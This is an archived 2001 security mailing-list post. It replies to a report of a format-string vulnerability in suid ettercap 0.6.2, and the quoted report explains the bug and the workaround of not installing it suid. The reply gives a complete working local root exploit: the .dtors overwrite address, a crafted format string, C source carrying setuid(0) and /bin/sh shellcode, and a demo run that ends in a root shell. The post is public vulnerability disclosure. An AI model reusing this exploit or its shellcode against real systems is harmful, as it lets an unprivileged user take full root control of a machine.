Firstly, let's retrieve the address of the section .dtors: cb@tshaw$ objdump -s -j .dtors /usr/local/sbin/ettercap /usr/local/sbin/ettercap: file format elf32-i386 Contents of section .dtors: 8119a70 ffffffff 00000000 ........ cb@tshaw$ So the fmt string is composed of: - "000" for allignment. - "\x74\x9a\x11\x08\x76\x9a\x11\x08" provides the addresses where we expect to write (here .dtors + 4 -- 0x8119a74.) - "%.49119x%16$hn%.16145x%15$hn" ret addr in shellcode. This format string was built using fmtbuilder: http://minimum.inria.fr/~raynal/index.php3?page=501 ---- ettercap-exp.c ---- #include <stdio.h> #include <stdlib.h> int main() { char buf[1024]; char shellcode[] = /* setuid(0) */ "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* Aleph 1 shellcode */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char *fmt = "000\x74\x9a\x11\x08\x76\x9a\x11\x08%.49119x%16$hn%.16145x%15$hn"; memset(buf, 0x90, 1024); memcpy(buf + 1024 - strlen(shellcode), shellcode, strlen(shellcode)); setenv("SHELLCODE", buf, 1); execl("/usr/local/sbin/ettercap", "ettercap", fmt, 0x0); } ---- ettercap-exp.c ---- Demo: This demo is made with a suid root version. cb@tshaw$ gcc -o ettercap-exp ettercap-exp.c cb@tshaw$ ./ettercap-exp ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA... may the packets be with you... Invalid host address 000tv00000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000 ....snip.... 0000000000000000000000000000000000000000000000081020c0 !! sh-2.04# id uid=0(root) groups=100(users) Best regards, -- Christophe Bailleux - Network & System Security Engineer Club-Internet / T-Online France Voice:+33-(0)1-5545-4789 - mailto:cb@t-online.fr On Tue, 4 Dec 2001, Blue Boar wrote: > Goobles sent another post to vuln-dev today, which was rejected due > to personal attacks in their note. I want to check out their claim, > however. If you want to see their original posting, it's on their > web site like the others, I'm sure. It includes a claimed exploit, > which cannot be posted due to their wishes that it not be separated > from the advisory. If someone wants to write an independent exploit, > I'd be happy to post that, provided it follows the list rules, > of course. > > Here's the basic problem: > > ettercap %x%x%x%x%x%x%x > ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA... > > may the packets be with you... > > > Invalid host address 807a0ef807a0e900bffffb71bffff850805ad52 !! > > Gobbles' point is that there is an option to configure it suid, > so this could be exploitable when that is used. Why someone > would want a packet capture program to be used by non-priv users.. > Well, I'm sure there's a good reason somewhere in the world. > > Is anyone using it that way? Are there OS distributions that come > with Ettercap installed by default? And, of course, is it suid? > (I can't imagine it would be.) The workaround is obvious, don't > run it suid or allow remote users who do not already have a shell > to execute it with a command-line parameter (such as via a web > interface.) > > BB >
This archive was generated by hypermail 2b30 : Wed Dec 05 2001 - 10:09:19 PST